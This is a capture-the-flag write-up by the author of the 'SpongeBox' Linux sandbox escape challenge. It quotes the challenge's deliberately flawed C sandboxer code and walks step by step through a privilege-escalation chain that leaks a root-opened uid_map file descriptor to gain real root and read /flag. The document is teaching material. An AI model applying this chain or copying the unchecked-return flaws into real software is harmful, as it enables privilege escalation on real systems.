SpongeBox - Bringing Linux Logical Vulnerabilities Back To Life - BlueWater CTF 2024
Author: Jonathan Jacobi (@j0nathanj).
SpongeBox is a Linux-based sandbox escape challenge from Blue Water CTF 2024.
The original motivation for this challenge was actually a set of old Linux kernel vulnerabilities and some interesting behaviors around them, which together ended up as a really nice CTF challenge.
The relevant files for the challenge can be found here (SpongeBob.tar.gz was handed out).
There is a /flag file that is readable only by root. The challenge is initially spawned as root.
The Challenge
The layout of the challenge is pretty simple: a server (written in C) that listens for connections and supports 3 possible commands:
- Creating a sandbox and running an ELF binary.
- Connecting to a sandbox: The Sandboxee should set stdin/stdout as FDs that are going to be used by the Sandboxer, in a way that the Sandboxee can read() from stdin data that the Sandboxer sent, and write() to stdout data that the Sandboxer will receive.
- Communicating with the sandbox: This will write() into the stdin FD of the Sandboxee to allow this data to be read inside the Sandbox. It will also read() data from the stdout that was set up for the Sandboxee and send back the result.
This whole behavior essentially mimics the ability to set up a sandbox, run a binary inside of it, communicate with it, and get the results.
1. CMD_CREATE - Creating a Sandbox 🆕
This function creates a new sandboxed process, and receives the contents of an ELF file that will be executed from within the sandbox.
The sandboxer creates a new sandboxee process, with all possible new namespaces. The sandbox creation is done by a “weak” user (non-root).
The sandbox creation also creates a socketpair() and shares it with the sandboxee, to be able to sync with it. Specifically, this allows the sandboxer to FIRST map the uid & gid of the new user namespace, before the sandboxee tries to setuid().
int create_sandbox(sandbox_args_t *args) {
    // ...
    // Create a socketpair for synchronization
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_socket) == -1) {
        perror("socketpair");
        munmap(stack, STACK_SIZE);
        return -1;
    }
    // Drop privileges before creating the sandboxee
    drop_privileges();
    child_pid = clone(run_sandbox, stackTop,
                      CLONE_NEWPID | CLONE_NEWNET | CLONE_NEWUTS | CLONE_NEWCGROUP |
                      CLONE_NEWIPC | CLONE_NEWNS | CLONE_NEWUSER | SIGCHLD,
                      args);
The call to drop_privileges() essentially means that the owner of the newly created user namespace is a non-root user.
void drop_privileges(void) {
    if (setegid(DEFAULT_GID) != 0) {
        perror("setegid failed in drop_privileges");
        exit(-1);
    }
    if (seteuid(DEFAULT_UID) != 0) {
        perror("seteuid failed in drop_privileges");
        exit(-1);
    }
}
There is also additional synchronization with the child for the mapping, as can be seen:
int create_sandbox(sandbox_args_t *args) {
    // ...
    // ...
    child_pid = clone(run_sandbox, stackTop,
                      CLONE_NEWPID | CLONE_NEWNET | CLONE_NEWUTS | CLONE_NEWCGROUP |
                      CLONE_NEWIPC | CLONE_NEWNS | CLONE_NEWUSER | SIGCHLD,
                      args);
    // Gain capabilities to continue the sandboxer
    gain_privileges();
    // ...
    // Parent process: set up UID/GID mappings for the child
    deny_setgroups(child_pid);
    setup_idmaps(child_pid, args->uid, args->gid);
    // Signal the child that UID/GID mappings are set up
    if (write(sync_socket[0], "x", 1) != 1) {
        perror("Failed to write to sync socket");
    }
    // ...
}
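The handshake above can be reproduced in isolation. The following is a minimal sketch, assuming a plain fork() instead of clone() with new namespaces; the function name sync_handshake_demo is hypothetical and not part of the challenge. The child blocks on read() until the parent has finished its setup and sends a single byte.

```c
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical demo, not challenge code: returns 0 if the child only
 * proceeded after receiving the parent's one-byte signal, -1 otherwise. */
int sync_handshake_demo(void) {
    int sync_socket[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_socket) == -1)
        return -1;

    pid_t child = fork();
    if (child == -1) {
        close(sync_socket[0]);
        close(sync_socket[1]);
        return -1;
    }

    if (child == 0) {
        /* Child: close the parent's end, then wait for the signal byte. */
        char sync_char = 0;
        close(sync_socket[0]);
        ssize_t n = read(sync_socket[1], &sync_char, 1);
        _exit((n == 1 && sync_char == 'x') ? 0 : 1);
    }

    /* Parent: this is the point where the ID maps would be written. */
    close(sync_socket[1]);
    int sent = (write(sync_socket[0], "x", 1) == 1);
    close(sync_socket[0]);

    int status = 0;
    if (waitpid(child, &status, 0) != child)
        return -1;
    return (sent && WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}
```

Note that the signal only says "the parent is done", not "the mappings were written successfully", which matters later in the write-up.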
An interesting thing to note here is that both the uid and the gid that are used as the inner uid and gid inside the sandbox are strings (yes, verified properly to be all digits…) controlled remotely.
This in itself is not a security issue, as those are the ids inside the sandbox - and they can be arbitrary values.
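The challenge's digit check is not shown in this write-up, so the following is only a sketch of what such a validator could look like; the name is_all_digits is a hypothetical stand-in. The point worth noticing is that a check like this constrains the characters of the string, not its length.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for the challenge's digit validation.
 * Accepts non-empty strings made only of '0'..'9', of any length. */
bool is_all_digits(const char *s) {
    if (s == NULL || *s == '\0')
        return false;
    for (const char *p = s; *p != '\0'; p++) {
        if (!isdigit((unsigned char)*p))
            return false;
    }
    return true;
}
```

Under this sketch, a string of thousands of zeros is just as valid as "1000".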
Sandbox creation - run_sandbox()
This function is the entry point for the sandboxee. It essentially sets up the sandbox, and then execveat()-s the ELF memfd created earlier.
void run_sandbox(sandbox_args_t *args) {
    // Close the parent's end of the sync socket
    close(sync_socket[0]);
    PCHECK(setup_sandbox(args->uid, args->gid) == 0, "setup_sandbox failed");
    // Close the child's end of the sync socket
    close(sync_socket[1]);
    execveat(args->fd, "", NULL, NULL, AT_EMPTY_PATH);
    PCHECK(false, "execveat failed");
}
The setup_sandbox() logic is also pretty simple. It calls setresgid() and setresuid() for the inner IDs, after it receives the signal from the sandboxer that the uid and the gid are now mapped.
Let’s take a look at it:
static int setup_sandbox(char *uid, char *gid) {
    char sync_char = '\x00';
    uid_t uid_num = 0;
    gid_t gid_num = 0;
    // Wait for parent to set up UID/GID mappings and setgroup configuration
    if (read(sync_socket[1], &sync_char, 1) != 1) {
        FAIL("Failed to read from sync socket");
    }
    uid_num = atoi(uid);
    gid_num = atoi(gid);
    // Set the newly mapped user and group ids
    become_user_group(uid_num, gid_num);
    return 0;
}
And the become_user_group() function is also pretty simple:
void become_user_group(uid_t uid, gid_t gid) {
    // Switch to the newly mapped user and group
    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);
}
💡 Primitive #1: Lack of return value check of setresuid() and setresgid()
The return values of these 2 function calls are never checked. Meaning, if setting the IDs does not work, well... nothing too special happens: the sandboxee simply keeps running with the credentials it already had.
This behavior is not very interesting on its own, but let’s keep that in the back of our minds. It will be useful later.
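For contrast, here is a minimal sketch of what a checked variant might look like. The name become_user_group_checked is hypothetical; the challenge intentionally does not do this. A caller that treated a non-zero return as fatal would stop the sandboxee before it runs with unexpected credentials.

```c
#define _GNU_SOURCE /* setresuid()/setresgid() declarations in glibc */
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical hardened variant: reports failure instead of ignoring it.
 * Returns 0 on success, -1 if either call fails. */
int become_user_group_checked(uid_t uid, gid_t gid) {
    /* Group first: after dropping the UID we may no longer be allowed to. */
    if (setresgid(gid, gid, gid) != 0) {
        perror("setresgid");
        return -1;
    }
    if (setresuid(uid, uid, uid) != 0) {
        perror("setresuid");
        return -1;
    }
    return 0;
}
```

Passing (uid_t)-1 or (gid_t)-1 leaves the corresponding IDs unchanged, which is a convenient way to exercise the helper without needing any privileges.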
Sandbox creation - setup_idmaps()
The other interesting function to examine is setup_idmaps(), responsible for mapping the provided uid and gid into the newly created user namespace.
The supplied uid and gid parameters are controlled remotely, and those are the IDs inside the sandbox.
void setup_idmaps(pid_t pid, char *uid, char *gid) {
    int uid_map_fd = -1, gid_map_fd = -1;
    char *uid_map = NULL, *gid_map = NULL;
    char *uid_map_path = NULL, *gid_map_path = NULL;
    // Open the uid_map file
    asprintf(&uid_map_path, "/proc/%d/uid_map", pid);
    uid_map_fd = open(uid_map_path, O_WRONLY);
    // Write the mapping
    asprintf(&uid_map, "%s %d 1", uid, DEFAULT_UID);
    write(uid_map_fd, uid_map, strlen(uid_map) + 1);
    // Open the gid_map file
    asprintf(&gid_map_path, "/proc/%d/gid_map", pid);
    gid_map_fd = open(gid_map_path, O_WRONLY);
    // Write the mapping
    asprintf(&gid_map, "%s %d 1", gid, DEFAULT_GID);
    write(gid_map_fd, gid_map, strlen(gid_map) + 1);
}
💡 Primitives #2 + #3: UID/GID Maps setups trickeries
Clearly there are a few more interesting things here as well:
- 💡 Primitive #2: No return value checks for writing to the uid and gid maps.
- 💡 Primitive #3: The uid_map and gid_map FDs are left open and leaked. In most cases this is not useful, as writing to uid_map and gid_map is possible only once (a kernel-level check).
Given those 2 primitives, one can wonder: can we get the write() to the uid_map to fail, and somehow leak an FD to a yet-to-be-written uid_map? Why does this even help us?
🛑 A Linux Kernel History Lesson!
A very interesting observation about the uid_map is that different users can write different contents to the file, but everyone can open it.
This is somewhat unusual, as we're used to either being able to write to a file, or not, based on the file's permissions. We're less used to permission checks conducted upon write().
The case of uid_map is that there IS a check upon write(), and it allows different things for different writers.
An interesting question comes up: what if we open() the uid_map and pass it as the stdout/stderr FD of a privileged process? For example, by execve()-ing a suid binary?
Specifically, we can exec sudo and also change argv[0] to arbitrary content, and if we fail with an incorrect password we can cause a partially controlled write() to that FD, by a privileged process!
- It usually writes sudo: 3 incorrect password attempts or something around that. sudo is actually argv[0], so if we change that, we have a partially controlled write().
We can make that a more precise write by coming up with creative primitives like ulimit()-s. But you get the idea…
So is that going to work…?
Almost… but more permission checks 😔
Turns out that for a short while, this was an actual vulnerability!
The way the kernel developers solved it is by ALSO recording the permissions of the OPENER of the file, and during the write() there is a check that verifies that both the opener and the writer have the correct permissions (CAP_SYS_ADMIN in the target user namespace).
⏩ Going back to the challenge: Leaking the uid_map fd
So if you recall, we were wondering if it would even be interesting to leak the uid_map FD, and we just found out that IT IS INTERESTING, because the OPENER of the uid_map in setup_idmaps() is a privileged (root) process!
The next logical question is… can we even leak the uid_map fd?
💡 Primitive #4: Leaking the FD!
Well, we need to get the write() to fail, as writing to the uid_map is allowed only once (that makes sense too, the kernel devs don't want race conditions around ids…).
Let's take a look at how the write() handler for uid_map is implemented in the Linux Kernel source code.
This is actually implemented inside /kernel/user_namespace.c under map_write():
static ssize_t map_write(struct file *file, const char __user *buf,
			 size_t count, loff_t *ppos,
			 int cap_setid,
			 struct uid_gid_map *map,
			 struct uid_gid_map *parent_map)
{
	// ...
	char *kbuf, *pos, *next_line;
	/* Only allow < page size writes at the beginning of the file */
	if ((*ppos != 0) || (count >= PAGE_SIZE))
		return -EINVAL;
	// ...
	/* Only allow one successful write to the map */
	if (map->nr_extents != 0)
		goto out;
We immediately notice the check that allows for only 1 successful write to uid_map.
We also immediately see a FAIL FAST check in the beginning, which requires:
- The write() to not be lseek()-ed before (the check with ppos).
- The amount of bytes that are going to be written to the uid_map to be less than PAGE_SIZE (4096).
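The early check is easy to model in user space. The sketch below is not kernel code: map_write_precheck and MODEL_PAGE_SIZE are hypothetical names, and a 4 KiB page size is assumed. It mirrors only the condition quoted above, and because it returns before the "one successful write" check is reached, a write rejected here leaves the map untouched.

```c
#include <errno.h>
#include <stddef.h>

#define MODEL_PAGE_SIZE 4096 /* assumption: 4 KiB pages */

/* User-space model of the fail-fast check at the top of map_write().
 * Returns 0 if the write would get past the check, -EINVAL otherwise. */
int map_write_precheck(long long pos, size_t count) {
    if (pos != 0 || count >= MODEL_PAGE_SIZE)
        return -EINVAL;
    return 0;
}
```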
Well, we can't cause an lseek(), but… remember we remotely control the uid (as a string!) of the inner user namespace?
💡 Primitive #5: Leaking a privileged open()-ed & non write()-ten FD to a uid_map
Combining those points together, we can come up with the following idea!
The handler for CMD_CREATE indeed checks that the uid is a digit-only string, but it can also be up to 4095 bytes long (anything shorter than MAX_STRING_SIZE, which is 4096). Together with the rest of the mapping line and the trailing NUL byte, the buffer written to the uid_map is then longer than 4096 bytes, and we can make write() fail!
This is what the handler looks like in main():
if ((bytes_read != sizeof(uid_size)) ||
    (uid_size >= MAX_STRING_SIZE)) {
    send_error(1, "Failed to receive UID size");
    break;
}
bytes_read = read(0, uid, uid_size);
if (bytes_read != uid_size) {
    send_error(1, "Failed to receive UID");
    break;
}
uid[uid_size] = '\0'; // Ensure null-termination
// Verify this is an actual number
if (!is_valid_number(uid)) {
    send_error(1, "Invalid UID");
    break;
}
It can clearly be seen that we can pass up to MAX_STRING_SIZE - 1 digits, which is more than enough!
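The arithmetic can be checked with a small sketch. It reuses the "%s %d 1" format and the strlen() + 1 length from setup_idmaps(); the helper names and the outer UID value of 1000 are assumptions, since the actual DEFAULT_UID is not shown in this write-up.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Number of bytes setup_idmaps() would hand to write() for a given inner
 * UID string: the formatted "<uid> <outer> 1" line plus the trailing NUL. */
size_t map_write_count(const char *uid, int outer_uid) {
    assert(uid != NULL);
    int len = snprintf(NULL, 0, "%s %d 1", uid, outer_uid);
    return (len < 0) ? 0 : (size_t)len + 1;
}

/* Builds a UID string made of `digits` zeros; the caller frees it. */
char *make_zero_uid(size_t digits) {
    char *uid = malloc(digits + 1);
    if (uid == NULL)
        return NULL;
    memset(uid, '0', digits);
    uid[digits] = '\0';
    return uid;
}
```

With 4095 zeros and a four-digit outer UID, the count is 4095 + 1 + 4 + 2 + 1 = 4103 bytes, which is at least PAGE_SIZE, so the kernel rejects the write before touching the map. An ordinary UID such as "0" gives only 9 bytes.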
📋 Primitives so far!
Using primitives #2, #3 and #4, we can finally achieve #5, which is:
Having a leaked uid_map FD in the Sandboxer process, that is open()-ed by a privileged process, and not write()-ten into.
Also, thanks to primitive #1, the setresuid() and setresgid() calls that happen in the SANDBOXED process, which exist in order to become the desired UID/GID inside the sandbox, will fail.
They will fail because the mapping did not ACTUALLY take place, so changing to an inner UID will not work as it is not mapped. BUT this is not going to make any difference, as the return value is ignored, as seen in primitive #1!
This is enough from CMD_CREATE, but we definitely found some very interesting behaviors.
2. CMD_CONNECT: Connecting to the sandbox 🔗
This logic is very simple. It grabs fd = 0 and fd = 1 of a sandboxee (based on a sandbox id) using pidfd_getfd(), and saves them in the struct that represents the sandbox.
int connect_sandbox(sandbox_t *sandbox) {
    // ...
    // Open a file descriptor to the sandbox process
    pidfd = syscall(SYS_pidfd_open, sandbox->pid, 0);
    if (pidfd == -1) {
        printf("pidfd_open failed\n");
        goto cleanup;
    }
    // Get file descriptor (stdin) from the sandbox process
    stdin_fd = syscall(SYS_pidfd_getfd, pidfd, STDIN, 0);
    if (stdin_fd == -1) {
        printf("pidfd_getfd failed for stdin with err %s\n", strerror(errno));
        goto cleanup;
    }
    // Get file descriptor 1 (stdout) from the sandbox process
    stdout_fd = syscall(SYS_pidfd_getfd, pidfd, STDOUT, 0);
    if (stdout_fd == -1) {
        printf("pidfd_getfd failed for stdout with err %s\n", strerror(errno));
        goto cleanup;
    }
    sandbox->stdin_fd = stdin_fd;
    sandbox->stdout_fd = stdout_fd;
    // ...
Pretty simple stuff.
💡 Primitive #6: Actually receiving a leaked uid_map fd in a Sandboxee
Once we leak an FD in the Sandboxer, we can create yet another Sandbox, and it will be spawned with a leaked uid_map fd as we described above!
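The descriptor survives into the new sandboxee because setup_idmaps() opens it without O_CLOEXEC: the child created by clone() gets a copy of the descriptor table, and descriptors without the close-on-exec flag stay open across execveat(). A sandboxee binary could locate such inherited descriptors with something like the sketch below; the helper names are hypothetical and not taken from the published exploit.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdbool.h>

/* True if `fd` is an open descriptor in the calling process. */
bool fd_is_open(int fd) {
    return fcntl(fd, F_GETFD) != -1 || errno != EBADF;
}

/* Returns the lowest open descriptor in [first, limit), or -1 if none.
 * Scanning from 3 upwards skips stdin, stdout and stderr. */
int find_inherited_fd(int first, int limit) {
    for (int fd = first; fd < limit; fd++) {
        if (fd_is_open(fd))
            return fd;
    }
    return -1;
}
```

For example, find_inherited_fd(3, 64) would report the first descriptor beyond the standard three that the sandboxee was started with.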
3. CMD_COMMUNICATE - Communicating with the sandbox 💬
This logic is also very trivial. It writes to the stdin FD that was grabbed in the CMD_CONNECT phase, and reads from stdout (yes, those are the right operations: stdout is actually where the sandboxee writes, so we're reading from it, and the other way around with stdin).
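The handler itself is not shown in this write-up, so here is only a minimal sketch of the core operation as described; the function name communicate and its signature are assumptions. The important detail is that the write() is performed by the sandboxer process, on whatever file the grabbed stdin descriptor happens to refer to.

```c
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical sketch of the CMD_COMMUNICATE core: push `input` into the
 * sandboxee's stdin, then read its reply from the sandboxee's stdout.
 * Returns the number of reply bytes read, or -1 on failure. */
ssize_t communicate(int stdin_fd, int stdout_fd,
                    const void *input, size_t input_len,
                    void *output, size_t output_cap) {
    if (write(stdin_fd, input, input_len) != (ssize_t)input_len)
        return -1;
    /* Blocks until the sandboxee produces output (or closes its end). */
    return read(stdout_fd, output, output_cap);
}
```

A quick way to try it is to pass both ends of a pipe(), in which case the input is simply echoed back.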
💡 Primitive #7: Writing to the uid_map from a privileged process!
Recall that we managed to leak the uid_map fd to the sandboxee. Also, that same FD has not been written into, and it is open()-ed by root.
Meaning, we just need to write to it from a privileged process, as seen before in the kernel checks.
Given the fact that the sandboxer can “steal” stdin and stdout, the Sandboxee can dup2() the leaked FD into the FD that the Sandboxer is going to steal & write into (stdin, fd == 0).
This KEEPS the permissions of the opener as those of the original opener (thanks to pidfd_getfd()), which is root.
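The reason the opener is preserved is that pidfd_getfd() duplicates a descriptor rather than reopening the file: the new descriptor refers to the same open file description, which is where the state recorded at open() time lives. Since pidfd_getfd() needs Linux 5.6+ and ptrace-level access to the target, the sketch below uses plain dup() as a stand-in to show the sharing; the function name and the temporary path used with it are hypothetical.

```c
#include <fcntl.h>
#include <unistd.h>

/* Returns 1 if a duplicate of a freshly opened descriptor shares its file
 * offset (and therefore its open file description), 0 if not, -1 on error. */
int dup_shares_description(const char *path) {
    int fd = open(path, O_RDWR | O_CREAT | O_TRUNC, 0600);
    if (fd == -1)
        return -1;

    int copy = dup(fd);
    if (copy == -1) {
        close(fd);
        return -1;
    }

    /* Write through the copy, then observe the offset via the original. */
    int result = -1;
    if (write(copy, "abc", 3) == 3)
        result = (lseek(fd, 0, SEEK_CUR) == 3) ? 1 : 0;

    close(copy);
    close(fd);
    return result;
}
```

Had the file been opened a second time instead, the two descriptors would have independent offsets, and also an independent opener.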
This works! We have an FD to a uid_map that hasn't been written into yet, and is also opened by a privileged process + going to be written into by a (controlled) privileged process.
Now the only thing that's left is writing WHATEVER WE WANT into the uid_map, and that's going to be permitted!
Chaining it all together! 🔗 💣
Summarizing it all together, the attack would look like this:
- Create the first sandboxee + make the UID be 4095 * '0', which will cause the write() to the uid_map to fail, and leak the FD in the sandboxer.
- The first sandboxee will execute our custom binary that will sleep() a bit :)
- Now create a second sandboxee. Make the creation work.
- The second sandboxee has the uid_map of the first sandboxee leaked into it, as fd == 6 (leaked).
- In the second sandboxee, dup2() the fd == 6 into fd == 0 (stdin).
- Trigger CMD_CONNECT with the second sandboxee, which will grab the uid_map fd into the sandboxer.
- Call CMD_COMMUNICATE with the second sandboxee, and write '0 0 1' to it, which will map the real UID == 0 into UID == 0 inside the FIRST SANDBOXEE (thanks to the leaked FD).
- Inside the first sandboxee, we're now privileged and we can setuid(0), which will give us a REAL ROOT PRIVILEGE.
- From the first sandboxee, just read the flag file, and using CMD_COMMUNICATE leak it outside.
- Profit :)
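The dup2() step performed by the second sandboxee can be sketched as a small helper. This is not the published exploit; the name expose_leaked_fd is hypothetical, and the descriptor number 6 in the usage note is simply the value reported in the steps above.

```c
#include <assert.h>
#include <unistd.h>

/* Makes `target_fd` refer to the same open file as `leaked_fd`, so that a
 * later pidfd_getfd() on `target_fd` hands out the leaked file.
 * Returns 0 on success, -1 on failure. */
int expose_leaked_fd(int leaked_fd, int target_fd) {
    assert(leaked_fd >= 0 && target_fd >= 0);
    return (dup2(leaked_fd, target_fd) == target_fd) ? 0 : -1;
}
```

In the second sandboxee this would be called as expose_leaked_fd(6, STDIN_FILENO), followed by a sleep() long enough for CMD_CONNECT and CMD_COMMUNICATE to run.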
The full exploit can be found here. It is composed of a Python script that interacts with the server, plus two C files and the binaries built from them, which are used as the sandboxees.
Summary 🏁
I had a lot of fun writing this challenge, especially as it involved chaining multiple logical issues together into something that is not so trivial to think of.
I hope you enjoyed the walkthrough, and feel free to reach out to me on X @j0nathanj!